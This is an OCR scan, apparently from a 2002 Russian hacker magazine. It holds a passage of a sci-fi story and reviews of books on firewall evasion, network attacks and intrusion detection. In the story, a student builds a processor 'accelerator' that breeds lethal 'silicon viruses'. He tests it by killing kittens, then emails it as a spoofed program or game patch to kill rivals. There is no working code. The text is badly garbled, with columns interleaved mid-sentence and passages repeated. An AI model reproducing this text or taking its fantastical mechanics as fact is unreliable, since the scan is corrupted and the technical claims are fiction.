принципиально новое. Его программа, которую он собирался со- 
здать в течение ближайшего месяца, должна была оптимизировать 
структуру процессора в соответствии с решаемой на данном кон- 
кретном компьютере задачей - путем перекраивания микросхем «на 
ходу». Процессор становился «живым». 
Современные «камни» обладали огромными невостребованными ре- 
сурсами. Вадим сумел-таки направить эту внутреннюю нереализо- 
ванную энергию на решение заданной президентом «Интел» задачи. 
Если бы ему все удалось, то корпорация AMD прекратила бы свое 
существование. 
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вый, из последней партии, после чего дождался появления трехмер- 
ного интерфейса «Windows» и откинулся в кресле. В центре экрана 
появилось предложение запустить «CPU accelerator. 
- Please, - коротко произнес Вадим, указывая на «мышку». Менед- 
жер протянул руку, явив Вадиму массивный золотой перстень на 
указательном пальце, и ткнул указателем в розовый кубик кнопки 
«Yes», Окошко с приглашением исчезло. Ничего не произошло. 
Менеджер вопросительно взглянул на Вадима. Тот понимающе кив- 
нул головой и запустил из меню основное окошко программы, после 
чего выбрал там нужную скорость работы процессора, нажал пару 
раз «Apply», после чего запустил тестовую программу и продемонст- 
рировал менеджеру результат бенчмарка. Скорость процессора 
выросла чуть ли не в полтора раза. 

«Интеловец» поджал губы и покачал головой, после чего, поговорив 
по телефону, перевел на счет Гостюхина некую сумму денег и на 
прощание дал ему для тестирования программы последний образец 
творчества архитекторов корпорации - в красивой цветастой коро- 
бочке. 

Когда менеджер ушел, Вадим вернулся за разогнанный комп и с 
удовлетворением посмотрел на результаты своей работы, потом 
вновь открыл окошко «акселератора» и решил добавить «камню» по 
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Структура « камня» была нарушена, но то, как она была нарушена, 
привело в изумление Вадима - кристалл жил своей жизнью, 
силиконовые частицы сгоревшего процессора самостоятельно 
передвигались и даже выползали из поля зрения. То, что видел сейчас 
Гостюхин на экране микроскопа, выведенного на монитор, - было 
НОВОЙ ФОРМОЙ ЖИЗНИ, жизни на основе кремния. 
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В течение месяца он не посещал занятия в Академии, сославшись 
на болезнь, - ему все простили за его гениальность. Вадим проводил 
за компьютером и за книгами Гарри Крауна по восемнадцать-двад- 
цать часов в сутки, моделируя различные подходы к решению про- 
блемы. Благодаря корпорации «Интел» он уничтожил своими экспе- 
риментами не один десяток «камней» - но фирма продолжала снаб- 
жать его дорогостоящими процессорами новых поколений, которых 
еще даже не было в продаже (капиталисты делали ставку на Гостю- 
хина, не жалея никаких денег - правда, с него взяли подписку о не- 
разглашении производственной тайны). 
Разгадка приближалась постепенно - через бессонные ночи, через 
две разбитых клавиатуры, через головную боль и резь в глазах, че- 
рез десятки литров пива и еще большее количество чипсов. Задача 
полностью поглотила его - и, глядя на его работоспособность, по- 
степенно сдавалась. 
К концу третьей недели была готова бета-версия; наконец-то один 
из процессоров после ее запуска «сдох» не сразу, а после четырех 
минут судорожной работы. Это был значительный успех. Вадим по- 
нимал, что он на верном пути - тем более что «Эс-Би» не прощал 
ошибок, а, следовательно - если программа работала, значит оши- 
бок в ней нет. Оставалось найти правильный алгоритм воздействия 
на кремниевую структуру - чтобы то множество транзисторов, что 
было спрятано в «камень», не превращалось в силиконовые сопли, а 
могло полноценно работать. 
И вот настал день, когда Вадим собирался испытать свою програм- 
му в присутствии представителя «Интел». Прибывший к нему менед- 
жер внимательно изучил короткий печатный отчет, который Гостю- 
хин набросал ночью, довольно криво переведя его на английский, 
после чего жестом попросил продемонстрировать успехи. Вадим за- 
грузил компьютер, ткнул пальцем в тестовые строки, намекая на то, 
что все без обмана - процессор действительно корпоративный, но- 
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максимуму. И тут же процессор сдох - экран мигнул и погас, из кор- 
пуса повалил вонючий дым, там плавился шлейф, провисший над 
раскаленным сердцем компьютера. 

Ничуть не разочарованный Гостюхин, взяв в руки отвертку, разо- 
брал корпус и заглянул внутрь. Массивный кулер оказался спаян- 
ным с процессором в один конгломерат - настолько высоким был пе- 
репад температуры. Вадим протянул было руку внутрь, чтобы попы- 
таться размокнуть защелки кулера, но что-то его остановило; жало 
отвертки передвинулось к винтам, крепящим «материнку». 

Сняв все одним блоком, Вадим осторожно, не прикасаясь к теплому, 
еще расплавленному куску кремния, поднес все это к окну и рассмо- 
трел при ярком свете. Что-то во всем этом ему не нравилось... 

В лаборатории Академии всегда кто-нибудь был. Вот и сегодня - не- 
сколько человек копошились в углу, изучая одним им известную за- 
дачу. Вадима же интересовал электронный микроскоп. Лаборант за 
сорок минут приготовил ему спил с «камня» - достаточной толщины, 
для того чтобы не потеряться в слоях и понять, что там происходит 
в моменты максимального разгона. 
Когда Вадим заглянул вглубь процессора, сердце его едва не вы- 
прыгнуло из груди. Структура «камня» была нарушена, что было аб- 
солютно естественно - на это его программа и была направлена; но 
то, как она была нарушена, привело в изумление Вадима - кристалл 
жил своей жизнью, силиконовые частицы сгоревшего процессора са- 
мостоятельно передвигались и даже выползали из поля зрения. То, 
что видел сейчас Гостюхин на экране микроскопа, выведенного на 
монитор, - было НОВОЙ ФОРМОЙ ЖИЗНИ, жизни на основе кремния. 
А на следующий день лаборант, который изготовлял срезы, умер. 
За четыре дня до смерти ему исполнилось девятнадцать лет... 


Из отчета агента «Брайана» от 29 апреля 2019 года ответственному 
по группе дознания: 


116 


Ж. 
9 @ 


о @ 


поуетьЬег/ 11/2002 ® 


wa wa 


ПОГРАНИЧНАЯ СТРАНА 


«...Гакже докладываю, что после обнаружения на винчестере Измай- 
лова письма с неизвестным ехе'файлом мной были просмотрены вин- 
честеры погибших Макартура и Паркера. На них я обнаружил анало- 
гичные письма, в которых жертвам отсылались не обнаруженные по- 
ка исполняемые файлы с расширением ЕХЕ; также предлагалось пе- 
реключить те же самые джамперы на материнской плате. Установле- 
но, что Макартур и Измайлов поступили так, как советовал неизве- 
стный автор писем, Паркер не счел нужным выполнить данное указа- 
ние - однако результат на выходе мы имеем тот же. Сами файлы в на- 
стоящий момент обнаружить не удалось...». 


Вадим, конечно же, заинтересовался этой смертью. Молодой па- 
рень, который умирает без видимых причин в расцвете лет, - это 
всегда вызывает подозрения и оправданное любопытство. Рас- 
спросив сотрудников лаборатории в достаточно деликатной фор- 
ме, он узнал, что парень просто упал во время работы с материа- 
лами, присланными с какой-то кафедры, - упал, как подкошенный, 
словно сраженный пулей. Дыхание и сердцебиение остановились 
практически мгновенно, пара лаборантов пытались оказать ему 
первую помощь, но безрезультатно - жизнь к нему не вернулась... 
Вскрытие, которое состоялось на следующий день, ничего не да- 
ло, была констатирована «Внезапная коронарная смерть»; доктор 
по окончании работы вздохнул, подписьвая протокол, и произнес 
в никуда: 
Да, молодеет инфаркт... Такие молодые парни уходят... 

Эти слова услышала лаборантка и повторила их родственникам, 
пришедшим забирать тело; так постепенно эта информация доб- 
ралась и до Вадима. Но он-то знал, что если знать, что искать, то 
обязательно найдешь. Кроме рук молодого парня из лаборатории, 
до сгоревшего «живого» процессора не дотрагивался никто - стои- 
ло предположить, что силиконовые существа, вызванные к жизни 
программой Гостюхина, каким-то образом проникли в тело лабо- 
ранта и вызвали там некие изменения, приведшие к смерти. 

Вадим, пораженный свалившимся на его голову открытием, тогда 
всерьез задумался о его побочных явлениях. И сложно было ска- 
зать, что оказалось для него важнее - сам факт возможности со- 
здания «силиконовых вирусов» или их возможность убивать тех, 
кто вступал в ними в контакт. 
Гостюхин занялся экспериментами - он гробил процессоры на мак- 
симальных скоростях и тыкал в них мордами котят, пойманных на 
улице. Котята пытались вырываться из цепких пальцев исследова- 
теля, но, единожды попав мордочкой в горячий силиконовый сплав, 
дергаться прекращали и погибали практически мгновенно, через 
десять, максимум пятнадцать секунд. 
Пересилив отвращение, Вадим пытался найти в телах котят по- 
вреждения, нанесенные вторжением «силиконовых вирусов», - он 
рассматривал под микроскопом места проникновения частиц в жи- 
вотных, пытаясь обнаружить какие-либо следы. И это ему удалось. 
Точечные следы на носах котят подтвердили его подозрения - что- 
то (а скорее всего, «кто-то») проникал в тела животных и произво- 
дил там какие-то повреждения, несовместимые с жизнью. Но как 
только Гостюхин принял решение идти в своих исследованиях 
дальше и попытаться найти органы-мишени, повреждаемые виру- 
сами, случился маленький кризис. 

В печать просочилась информация о разработках, которые ведет 
«Интел» в сотрудничестве с русским студентом; назревал очеред- 
ной антимонопольный скандал. Домой к Вадиму зачастил менед- 
жер, требуя повышения темпов работы. Но как только Гостюхин 
вернулся к акселератору, в последнем номере «Hardware Tech.» 
появилась скептическая статья профессора Макартура, в кото- 
рой последний достаточно популярно объяснял общественному 
мнению, что того, чем занимается сейчас «русская звезда Гостю- 
хин», быть не может по причине множества физических и матема- 
тических законов. 

Вадим, который видел не только основное, но и побочное действие 
программы, написанной по заказу «Интел», был крайне возмущен; 
после недолгой борьбы с самими собой он вырезал две трети ак- 
селератора в отдельную программу, после чего отправил ее про- 
фессору в Калифорнию, предварительно взломав его адресную 
книгу и использовав один из доверенных адресов. Будучи уверен- 


ным в том, что у профессора далеко не самый современный ком- 
пьютер, он для достижения необходимого эффекта в письме ука- 
зал, какие джамперы необходимо переключить для получения мак- 
симальной скорости. 
Его метод «социальной инженерии» сработал безукоризненно - че- 
ловек от природы любопытный, профессор сделал все, как и было 
указано в письме, после чего попытался переключить джамперы на- 
зад, считая, что вся проблема в этом, коснулся расплавленного 
процессора и скончался от сердечного приступа. Узнав о результа- 
те атаки, Вадим в очередной раз убедился в том, что, сам того не 
желая, создал оружие - достаточно мощное, чтобы убивать, и до- 
статочно незаметное, чтобы быть обнаруженным. 
Через неделю глава корпорации «Глобал сенсорик» Ким Паркер 
попытался обвинить «Интел» в устранении конкурентов - и его по- 
стигла участь Макартура. Но Вадим за эти восемь дней пошел го- 
раздо дальше, научив своих «силиконовых друзей» поражать и ви- 
деопроцессоры. Паркер, известный своим пристрастием к компью- 
терным развлечениям, получил письмо от одного из своих друзей - 
с патчем к игре, которую он пытался пройти в настоящий момент. 
И, естественно, Паркер не смог противостоять соблазну, открыл 
файл, после чего попытался извлечь расплавленную видеокарту 
из корпуса... 
Потом было еще несколько случаев рассылки «силиконовой смер- 
ти» - Вадим, уверовав в свою анонимность, совершил еще два 
убийства. Погибли люди, противостоящие его таланту, завистники 
и клеветники; погибли, ничего не подозревая. Их смерть не была 
связана следствием с компьютерами, поэтому в череду убийств, 
расследуемых ФБР, они не попали. 

Близился день сдачи программы менеджеру «Интел». Гостюхин за- 
кончил последние исправления, финальный вариант акселератора 
в нескольких экземплярах рассовал по своим логическим и физиче- 
ским дискам, после чего задумался - а вдруг кому-то придет в голо- 
ву использовать акселератор точно так же, как это сделал он сам. 
Тогда он в последний момент включил в программу незначительные 
исправления, не позволяющие рядовому юзеру создавать из сили- 
кона вирусы, надеясь стать единоличным пользователем нового ки- 
бернетического оружия. А на следующий день Марина заразила 
его вирусом настоящим - реальным, невыдуманным... 


Из отчета агента «Брайана» от 4 мая 2019 года ответственному по 
группе дознания: 
«Ввиду нежелания владельцев анонимных прокси-серверов вести с 
нами какие-либо переговоры, прошу вашего согласия на дополни- 
тельные меры воздействия... намереваюсь просмотреть логи юзе- 
ров, подключавшихся через следующие прокси (далее список)... 
Существует ряд предположений... Хочу довести до вашего сведе- 
ния, что 25 марта, 12 и 15 апреля 2019 года при невыясненных об- 
стоятельствах скончались лаборант и двое студентов Академии 
программирования - Голубцов Дмитрий (подрабатывал лаборан- 
том, находясь в академическом отпуске по неуспеваемости), Ман- 
суров Антон, 4-й курс, Кириллов Николай, 5-й курс. Причина смер- 
ти не установлена; при тщательном изучении обстоятельств смер- 
ти выявлены сходные моменты (см. приложение судебных медиков, 
листы 15 и 16). В настоящий момент разрабатывается несколько 
версий...». 


Мир рушился на глазах. Вадим вдруг почувствовал на своей шкуре 
- что это такое «быть инфицированным». Мысли о неотвратимо на- 
двигающейся неизлечимой болезни преследовали его, не давали 
сосредоточиться, заставляли сердце то замирать, то биться быс- 
трей, со все возрастающей скоростью. Волны бешенства сменя- 
лись периодами депрессии; Гостюхин вспоминал ту ночь с Мари- 
ной, проклиная всех и вся, в сотый, тысячный раз давая себе сло- 
во найти ее и уничтожить. Он с наслаждением представлял, как 
его вирус вторгается на компьютер Бескудниковой и порождает 
на нем миллиарды силиконовых мутантов, только и ждущих осто- 
рожного прикосновения тонкого женского пальца... 

Все это не единожды приходило ему во сне; занимало его созна- 
ние, вытеснив оттуда и учебу, и работу на корпорацию; порой он 
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даже забывал принимать пищу, только жажда выгоняла его из-за ускользали вместе с обрывками сновидений, в которых его неот- 


компа в магазин, где OH, опомнившись, покупал и что-нибудь поесть. ступно преследовала Марина, - но нередко Вадиму удавалось прой- 
Несколько раз он посещал тот клуб, где они познакомились; стоя у ти довольно сложные места, восстановив логику алгоритма и про- 
барной стойки, он пытался вытащить из бармена хоть какую-нибудь должив написание кода. 

информацию о таинственной девушке, но все тщетно - судя по все- Вскоре Вадим мог с уверенностью сказать - основная часть работы 
му, ее появление здесь было случайным, что приводило Вадима про- закончена. Как только он хоть что-нибудь узнает о Марине, файл- 
сто в маниакальное состояние. Умирать медленной смертью по воле убийца отправится делать свое грязное дело... 

случая - что может быть ужасней?! И как только программа была готова полностью, Вадиму пришло 
Гостюхин перечитал не один справочник по инфекционным болезням, письмо. Письмо от Марины. Вадим вначале ошалело смотрел в окно 
выискивая у себя симптомы «Эс-Би» - лихорадку, сыпь, усталость глаз диспетчера писем, глядя на обратный адрес « 

и множество других, перечисленных в группах «Главные» и «Второсте- marina@309.BB.0.0.F7/uDomains.ru «, потом метнулся к своему соф- 
пенные»; периодически он отмечал в своем состоянии некое соответ- ту, предназначенному для атаки. 

ствие с прочитанным; отправив отпечаток указательного пальца на ди- Письмо было адресовано не ему лично - он получил его как пользо- 
агностический сайт, он через час уже забыл об этом. В нем с новой си- ватель «Пограничной стражи». Марина сообщала, что вышло оче- 
лой вспыхнула волна ненависти к Марине, он сел в кресло и начал про- редное обновление, которое она выложила на одном из файловых 
чесывать Интернет в поисках контакта с ней. архивов, благодарила всех, кто использует ее программу, и поже- 
В промежутках между приступами бешенства, когда сознание при- лала получить за все это немного денег. Вадим не верил своим гла- 
ходило в норму, он писал программу - средство, с помощью которо- зам, удача сама шла к нему в руки - ящик стал основным, форварда 
го он сумеет отомстить. Все, что ему было нужно, - ее адрес в Сети. с него не было. 

Он уже позабыл о своем желании сдать анализ крови, чтобы под- Он ворвался к ней на ее хитрый файерволл при помощи прямого 
твердить то, о чем писала в своей записке девушка; Вадим, начи- сканирования, даже не пытаясь скрыться от систем обнаружения 
тавшись литературы, был абсолютно уверен в диагнозе, тем более вторжения, которыми ее брэндмауэр был снабжен в достаточной 
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Вадим постепенно превращался в киборга - на человека он был уже Mano 
похож; несколько гонцов из деканата он просто выставил за дверь, сославшись 
на болезнь; родителям на письма не отвечал; работа поглотила его целиком. 
Учебник Крацна был зачитан до дыр - само собой, ответов там не было, слишком 
фантастичной была задача для самого апологета программирования. 
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что некоторые из симптомов уже имели место - у молодого гения степени. Конечно же, он был блокирован, но один лишь факт сопри- 
поднялась температура, которая держалась в субфебрильных пре- косновения с Бескудниковой даже через «Пограничную стражу» был 
делах и не сбивалась обычными жаропонижающими препаратами ему нескрываемо радостен, он словно пес, напавший на след и виля- 
(что по учебнику говорило об активности вируса в зоне мозга, от- ющий хвостом, уцепился за ее адрес и начал использовать самые 
ветственной за поддержание нормальной температуры тела), бо- современные методы вторжения... 

лезнь постепенно разгоралась в нем, как искра. 

Программа не получалась. Никак не удавалось определить цель - Почему-то трудно было нажать «Enter». Но Вадим сумел - вспомнив, 
что именно должен был выполнить софт при обнаружении адреса как в его крови несутся сейчас по своим грязным делам маленькие 
Марины. В своих фантазиях Вадим видел не раз, как его «Silicon тела смертоносного вируса «Эс-Би»... 

Огеат», как он назвал свое творение, вторгается в тело девушки и Электронный вихрь тянул за собой. Пакеты, содержащие в себе 
разрушает его изнутри - изменяет ионный состав крови, забивает строки вируса, неслись к цели; они были разделены маршрутизато- 
капилляры мозга, невидимыми органеллами уничтожает нежные рами и мчались к месту вторжения разными путями, разными конти- 
клетки сердца... Всего-то - адрес, адрес, адрес!!! нентами; кабель, проложенный по дну океана, сменялся линией меж- 
Вадим постепенно превращался в киборга - на человека он был уже ду спутниковыми антеннами. Периодически один из пакетов, идущий 
мало похож; несколько гонцов из деканата он просто выставил за по слишком длинному пути, погибал, не добравшись до очередного 
дверь, сославшись на болезнь; родителям на письма не отвечал; ра- маршрутизатора, - тогда все рассыпанные в данный момент по Зем- 
бота поглотила его целиком. Учебник Крауна был зачитан до дыр - ле куски вируса вздрагивали, теряя часть себя. Но модем принимал 
само собой, ответов там не было, слишком фантастичной была за- контрольный сигнал и отправлял пакет заново - и тогда вирус обре- 
дача для самого апологета программирования. Растворимый аспи- тал себя как единое целое, собираясь в один файл на концевом уча- 
рин он запивал пивом, даже не замечая этого; глаза налились кро- стке. 

вью от многочасового смотрения в монитор. Комната была захлам- Время шло. Прежде чем войти в контакт с целью, вирус концентри- 
лена абсолютно ненужными вещами, зубная щетка валялась под ровался, проверял целостность транзакции, изучал сам себя на 
ванной в течение последней недели. Спал он прямо за компьютером, предмет возможных ошибок - но нет, проблем не было, все дошло в 
откидывая спинку и забрасывая ноги на стол. целости и сохранности. Файл в маршрутизаторе напоминал свернув- 
Периодически во сне к нему приходили решения некоторых про- шуюся пружину - если бы люди могли его увидеть. Первые его байты 
блемных мест - он вскакивал, едва не падая на пол, пытался сохра- аккуратно тянули свои щупальца к файрволлу «Пограничная стра- 
нить на бумаге или на экране те мысли, что таинственным образом жа», пытаясь определить в нем слабые места. 

вторгались в его сознание. Не всегда это получалось, порой мысли 
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ПОГРАНИЧНАЯ СТРАНА 


От компьютера, на который пытался проникнуть вирус, навстречу 
метнулась короткая горячая, безумно яркая молния и стеганула 
огненной плетью по щупальцам, определив в них [Р из заблокиро- 
ванного диапазона. Байты оборвались и разрядились, потеряв- 
шись в проводах, отходящих от маршрутизатора к другим объек- 
там. Файл сократился еще сильнее, втягиваясь внутрь принимаю- 
щего устройства, пряча свое тело в глубине. 

Следящий пакет, висящий за спиной вируса, определив поврежде- 
ние, послал запрос домой - базовый компьютер вернул недостаю- 
щие байты, отрастив новые щупальца, но на этот раз сделав их 
незаметнее. Файрволл провел молнией рядом с короткими чувстви- 
тельными щупальцами и не заметил их; шипя и разбрызгивая лужи 
искр, молния успокоилась и улеглась вдоль входящего кабеля 
сразу за маршрутизатором... 
Вадим мягко положил пальцы на клавиатуру. Он уже точно знал, 
что его модифицированный акселератор добрался до цели и сей- 
час ожидал от своего «хозяина» (Вадим отнесся к нему, как к ка- 
кому-то ручному животному) приказаний. Гостюхин понимал, что 
«Пограничная стража» отразила первое проникновение к Марине 
на комп; он попытался просканировать сеть в обход файерволла - 
не получилось, да ине ожидал Гостюхин от этого способа никако- 
го проку. Тогда он попытался создать некий симбиоз... 
Щупальце шевельнулось и поплыло (именно поплыло, отделившись 
от основного кода, став самостоятельной единицей) в сторону ог- 
ненной плети. Файрволл, словно золотистый дракон, лежал, не ше- 
велясь, в состоянии готовности, лениво подрагивая всем телом - 
будто дыша. Первый байт дотронулся до плети и попытался его об- 
вить - словно виноградной лозой. 
Тело файерволла взбудораженно дернулось, но щупальце, не- 
сколько раз мигнув, нежно погладило плеть вдоль ее золотых изги- 
бов и мягко, незаметно, влилось в нее. Несколько других, более 
мощных огненных вихрей прыгнуло откуда-то из глубины маршру- 
тизатора, облетело вокруг вновь замершей, заснувшей, обману- 
той сторожевой плети и вернулось обратно. 
Гостюхин стер пот со лба и размял пальцы. Усталость от проде- 
ланной работы была незаметна - он только что получил отклик от 
своей «Силиконовой мечты», говорящий о победе над файервол- 
лом. С трудом верилось в то, что он только что проделал, - но 
факт остается фактом; это не он сам решил задачу, «Silicon 
Огеат» общалась с ним на понятном только им двоим языке Ас- 
семблера-2 и натолкнула его на решение. 
Судя по всему, вирус еще до проникновения в силиконовые струк- 
туры обретал черты, свойственные жизни... 
Управляющие сигналы настойчиво стучались в тело программы - 
«хозяин» принял решение начать вторжение. Вирус перекомпили- 
ровался - сам, без внешних воздействий, - после чего аккуратно 
нырнул в маршрутизатор. Плеть, обманутая «щупальцем-любовни- 
ком», благодушно-расслабленно лежала у ворот, которые обяза- 
на была охранять. На мгновение вирус замер рядом с ней (цепь 
искр пробежала по его телу, выражая удовлетворение проделан- 
ной работой), после чего на предельной скорости рванулся к ата- 
куемому компьютеру. 
Дальше все было очень просто - мимо кабеля скользнуть было 
нельзя. Вирус втянулся внутрь в виде письма, просканировал ад- 
ресную книгу, отправил ее Вадиму, сам сгенерировал текст пись- 
ма, использовав наиболее частый адрес из переписки, аккуратно 
прилег в папке «Входящие» и стал ждать прочтения... 

Гостюхин смотрел прямо перед собой невидящим взглядом. Мина 
замедленного действия лежала на компьютере Марины и только 
ждала щелчка «мыши». В это время сам Вадим получил пару писем 
- цифра «два» горела на счетчике майл-анализатора. Направив 
стрелку курсора на первое по времени, он на мгновение замер, по- 
том успокоил себя тем, что программы, подобной его «силиконово- 
му убийце», в настоящий момент нет ни у кого, и открыл его. 
«Портал «Эс-Би» - Диагностикс» - анониму 07-91A. Ваш отпечаток 
пальца проанализирован лаборантом 129 при помощи тестовой 
программы, сертифицированной Министерством здравоохранения. 


Заключение: организм анонима 07-91A не содержит ни вируса «Эс- 
Би», ни антител к нему; аноним 07-91А здоров. 

Просьба оплатить услуги лаборанта 129, перечислив на его счет 
(далее череда цифр) 250 рублей». 
Где-то далеко от замершего в изумлении Вадима рука Марины на- 
правила «мышку» на письмо, обманувшее «Пограничную стражу»... 
Второе письмо было длиннее. Обратный адрес - « 
marina@309.BB.0.0.F7/uDomains.ru «. Рука дрогнула, но курсор по- 
пал-таки в строку, письмо открылось в отдельном окне. 
«Здравствуй, Вадим. Помнишь меня, Марину, девушку с тусовки, 
проведшую с тобой замечательную ночь и отвратительное утро? 
Помнишь мою записку? Прости за неудачную шутку, мальчик. Ни 

я, ни ты не больны. Просто выслушав признания о написании виру- 
сов компьютерных, виртуальных, в реальной жизни убивающих 
других людей, я захотела поставить тебя на место твоих жертв - 
при этом «подарив» тебе вирус настоящий, страшный, медленно 
убивающий. Прошло десять дней, я не выдержала и пишу тебе о 
том, что моя записка было ложью - я, как нормальный человек с 
довольно гипертрофированной совестью, больше скрывать правду 
не в силах. Шутка, не больше - но я думаю, за эти дни ты ощутил 
тот ужас, который охватывает человека при слове «вирус». Прошу 
тебя - остановись, мальчик. Ты талантлив - так примени свой та- 
лант в мирных областях... Мне хотелось бы встретиться с тобой 
еще раз. Прости меня. Марина». 
Вадим перечитал послание несколько раз. «Шутка», «прости», 
«больше скрывать правду не в силах»... Все последующие дейст- 
вия он выполнил автоматически - письмо в ответ было сгенериро- 
вано Гостюхиным за несколько секунд, отправлено Марине и уже 
через несколько секунд отметилось на почтовом сервере, с кото- 
рого Марина получала электронные послания. Но, как обычно, де- 
вушка просматривала письма в порядке их получения... 

Сигнал пришел быстро. Оставалось выполнить то, ради чего он 
оказался здесь, на чужом компьютере - найти кусок кремния, ко- 
торый окажется ближе. Череда импульсов ворвалась в «железную 
начинку» компа и сразу же определила круг задач, обнаружив ви- 
деопроцессор. Начался нагрев кремния; тем временем программа 
выстраивала из плавящегося материала новые атомные цепочки. 
Монитор уже давно мерцал, не понимая информации, передавае- 
мой на экран - но видеокарта еще держалась; однако вскоре пер- 
вые силиконовые вирусы зашевелились внутри перерожденного 
кристалла; зачатки разума двинули всю сформированную массу 
внутрь монитора. 

Непрерывно дергающийся ручеек переменного тока от сетевого 
фильтра к гнезду шнура внезапно обнаружил какую-то преграду 
на своем пути, попытался обойти - не получилось. Заряд стал ко- 
питься на входе и через долю секунды достиг критического разме- 
ра. После чего «силиконовые убийцы» сняли блокаду и пропустили 
импульс повышенного напряжения. 

Плоский экран вспух изнутри - сначала едва заметно, отразив в себе 
изумленное лицо девушки, потом более интенсивно, искривившись и 
едва сдерживаясь. Сеть трещин брызнула в разные стороны от цент- 
ра и швырнула острые осколки в лицо и шею Марины... 


Из отчета агента «Брайана» от 6 мая 2019 года ответственному по 
группе дознания: 

«...При осмотре места происшествия после идентификации трупа Ma- 
рины Бескудниковой было предпринято изучение содержимого ее 
компьютера путем снятия с него жесткого диска и подключения его к 
ноутбуку следственной группы... Установлено, что имеется 1 (одно) 
непрочитанное письмо, адрес отправителя vadim007@yahoo.com. 
Текст письма: «МАРИНА, НЕ ОТКРЫВАЙ НИЧЕГО, ЧТО ПРИШЛО 
РАНЬШЕ!!». Отправителем письма является Гостюхин Вадим Леони- 
дович, студент 4-го курса Академии программирования и анализа... 
Прошу вашей санкции на задержание Вадима Гостюхина для выясне- 
ния обстоятельств дела...». 
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ли, сканить - просканили, но теперь тебе 

уже хочется большего? Проникнуть в саму 
систему и завоевать полностью все узлы в сети? 
Дело настолько же интересное, насколько и опас- 
ное! Ведь не каждый админ - лох, попадаются и 
такие, что грамотно настроили межсетевой экран, 
пробиться через который, казалось бы, невозмож- 
но... Но чтобы тебе было все-таки хоть чуточку 
проще, я подобрал для тебя книжки, в которых 
достаточно подробно и основательно излагаются 
теория и принципы функционирования файрвол- 
лов и различных сетевых протоколов безопаснос- 
ти, чтобы ты знал, откуда начинать и как все же 
можно пройти через «огненную стену». 


| | да... ДоС устроили, дефейсить - отдефейси- 


Д.Г. Леонов, А.В. Пукацкий, И.Д. Медведовский, 
Б.В. Семьянов. Атака из Internet. - M.: 


СОЛОН-Р, 2002 - 368 с. 
олезной лите- 
ратуры, напи- 
санной наши- 


ми соотечественни- 
ками, существует не 
так уж и много, но 
вот, наконец-то, по- 
пался хороший эк- 
земпляр действи- 
тельно стоящей кни- 
ги. Тут рассказыва- 
ется просто про ку- 
чу всяких уязвимос- 
тей, и, причем, не 
просто идет описа- 
ние эксплойта, а 
присутствует еще и 
немного теории по описываемой дырке. И авторы 
пытаются объяснить тебе все достаточно понятным 
и нормальным языком, без всяких там научных 
терминов и прогонов на килотонны текста - все 
просто и понятно. Атаки на межсетевые экраны, 
естественно, не упущены из виду, и им посвящена 
целая глава; надо сказать, что данную тему авто- 
ры раскрыли практически на 100%, есть все - на- 
чиная от описания, как функционируют файрволлы, 
и заканчивая рассмотрением способов их обхода 
(а части «простое уклонение» и «сложное уклоне- 
ние» должны тебя особенно порадовать :). 
Рекомендуется: спецам по сетям и всем, кто 
хочет познать основы сетевой безопасности и 
нападения. 
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Microsoft Press. Межсетевое взаимодействие. 
- М.: РУССКАЯ РЕДАКЦИЯ, 2002 - 736 с. 


ы любишь мелко- 
_ ны софт? :). Вопрос, 

конечно, глупый, 

Межсетевое но в этой огромной бу- 

ы ке тебе предоставляет- 
ся возможность ощу- 
TUTb всю мощь этой ги- 
гантской фирмы и кон- 
кретно - воплощение 
ее идей в области по- 
строения серверов. Ко- 
нечно, вопросы кон- 
кретно по файрволлам 
тут не особо рассмат- 
риваются (правда, упо- 
минание об этой по- 
лезной фиче все же 
есть), но зато присутст- 
вует описание стандартных сетевых библиотек, вхо- 
дящих в винду и обеспечивающих один из сетевых 
интерфейсов. А еще тут рассказывается про постро- 
ение VPN сетей и объясняется, как обезопасить 
сеть с помощью файрволла, даже приводятся кон- 
кретные оптимизационные советы по настройке вин- 
дов (как утверждают сами же авторы - дефолтовые 
настройки не обеспечивают должной безопасности 
компьютера). Да кто бы и сомневаться стал :). 
Рекомендуется: 1Т-профессионалам и спецам по 
сетям, потому как любому другому нормальному 
человеку от такой литературы крышу снесет. 


У. Блэк. Интернет протоколы безопасности. - 
СПб.: ПИТЕР, 2001 - 286 с. 


омнишь статью 
о том, как си- 
деть легально и 


вполне на халяву в 
Инете (описывается в 
Хакере 9 за этот 
год). Вот там тебе 
предлагалось скачать 
программку и поста- 
вить ее себе, и лишь 
смутно рассказыва- 
лось, как же все это 
работает на уровне 
протоколов... Данная 
бука призвана испра- 
вить это упущение, и, 
изучив авторские мысли, ты сможешь совершенно 
спокойно разбираться в архитектуре протокола 
ТСРЛР и научишься создавать туннель на основе 
того самого 1СМР, чтобы со стороны все выгляде- 
ло, как обычный пинг :), который нерадивые ад- 
мины иногда даже и за траффик-то не считают :). 
Рекомендуется: тем, кто в первую очередь хо- 
чет познать принципы работы сети на уровне 
протоколов и узнать, как же все-таки работает 
туннелирование на практике. 


Интернет 


ран ort ha 
ie jormleoriw 


А. Лукацкий. Обнаружение атак. - СПб.: БХВ- 


Петербург, 2001 - 624 с. 
аконец-то по- 
палась до- 
стойная книга, 


написанная отечест- 
венным автором. 
Тут содержится по- 
дробное описание 
технологий информа- 
ционной безопаснос- 
ти, начиная от раз- 
бора по полочкам, 
на какие классы де- 
лятся атаки, и кон- 
чая разработкой 
собственной системы 
обнаружения вторже- 
ний извне. Причем 
все изложение материала основывается на реаль- 
ных примерах, со множеством готовых модулей 
для программ и схем функционирования различных 
сетевых систем. Естественно, присутствуют и опи- 
сания файрволлов, как их правильно настроить и с 
помощью каких ухищрений хакеры могут пройти 
сквозь межсетевой экран. И напоследок могу до- 
бавить, что в виде бонуса к книге прилагается 
диск с полезным софтом и примерами, описанны- 
ми на страницах данной полезной буки. 
Рекомендуется: спецам по сетям и просто людям, 
интересующимся, как происходят атаки на сеть. 


Редакция выражает благодарность магазину 
“Библио-Глобус” за предоставленные книги. 


Максим Левин. Как стать системным 
администратором. - М.: ПОЗНАВАТЕЛЬНАЯ КНИГА 
ПЛЮС, 2001 - 320 с. 


диотское и слиш- 
И ком уж попсовое 
название книги 
насторожило сразу при 
взгляде на этот шедевр 
человеческой мысли. 
Ничего хорошего во 
время чтения данной 
буки тебя не ждет, 
опять автор нарыл кучу 
старых материалов по 
разным источникам и 
выдает их за свои мыс- 
ли. Иногда излагает 
«свои» проблески зна- 
ний на сленге, а то 
нет-нет да и собьется 
на сухой научно-техни- 
ческий язык. Да, конеч- 
но, немного инфы по 
файрволлам присутству- 
ет, но уж слишком не- 
множко и почему-то со- 
ветов, как же все-таки стать сисадмином, я не на- 
